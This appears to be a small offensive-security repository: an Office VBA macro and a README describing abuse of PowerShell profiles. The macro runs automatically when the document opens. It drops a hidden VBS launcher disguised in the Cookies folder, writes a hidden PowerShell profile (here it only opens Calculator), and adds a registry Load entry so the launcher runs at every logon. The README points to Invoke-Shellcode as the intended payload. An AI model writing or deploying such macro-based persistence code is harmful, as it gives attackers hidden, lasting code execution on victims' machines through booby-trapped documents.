├── Macro
└── README.md


/Macro:
--------------------------------------------------------------------------------
 1 | 'Coded by Matt Nelson
 2 | 'twitter.com/enigma0x3
 3 | 'enigma0x3.wordpress.com
 4 | 
 5 | Sub Auto_Open()
 6 | 
 7 | WriteWrapper
 8 | WriteProfile
 9 | Reg
10 | 
11 | 
12 | 
13 | 
14 | End Sub
15 | 
16 | Public Function WriteWrapper() As Variant
17 | Set fs = CreateObject("Scripting.FileSystemObject")
18 |     Set a = fs.CreateTextFile("C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.txt", True)
19 |     a.WriteLine ("Dim objShell")
20 |     a.WriteLine ("Set objShell = WScript.CreateObject(""WScript.Shell"")")
21 |     a.WriteLine ("command = ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe""")
22 |     a.WriteLine ("objShell.Run command,0")
23 |     a.WriteLine ("Set objShell = Nothing")
24 |     a.Close
25 |     GivenLocation = "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\"
26 |     OldFileName = "cookie.txt"
27 |     NewFileName = "cookie.vbs"
28 |     Name GivenLocation & OldFileName As GivenLocation & NewFileName
29 |     SetAttr "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", vbHidden
30 | 
31 | End Function
32 | 
33 | Public Function WriteProfile() As Variant
34 | Set fs = CreateObject("Scripting.FileSystemObject")
35 |     Set a = fs.CreateTextFile("C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.txt", True)
36 |     a.WriteLine ("Invoke-Item C:\Windows\System32\calc.exe")
37 |     a.Close
38 |     GivenLocation = "C:\Windows\SysNative\WindowsPowerShell\v1.0\"
39 |     OldFileName = "Profile.txt"
40 |     NewFileName = "Profile.ps1"
41 |     Name GivenLocation & OldFileName As GivenLocation & NewFileName
42 |     SetAttr "C:\Windows\SysNative\WindowsPowerShell\v1.0\Profile.ps1", vbHidden
43 | End Function
44 | 
45 | Public Function Reg() As Variant
46 | Set WshShell = CreateObject("WScript.Shell")
47 | WshShell.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load", "C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs", "REG_SZ"
48 | Set WshShell = Nothing
49 | 
50 | End Function
51 | 
52 | 
53 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | PowershellProfile
 2 | =================
 3 | 
 4 | Abuses Powershell Profiles
 5 | 
 6 | A walk-through can be found here:
 7 | http://enigma0x3.wordpress.com/2014/06/16/abusing-powershell-profiles/
 8 | 
 9 | 
10 | Uses Invoke-Shellcode by Matt Graeber:
11 | PowerSploit Function: Invoke-Shellcode
12 | Author: Matthew Graeber (@mattifestation)
13 | License: BSD 3-Clause
14 | Required Dependencies: None
15 | Optional Dependencies: None
16 | 


--------------------------------------------------------------------------------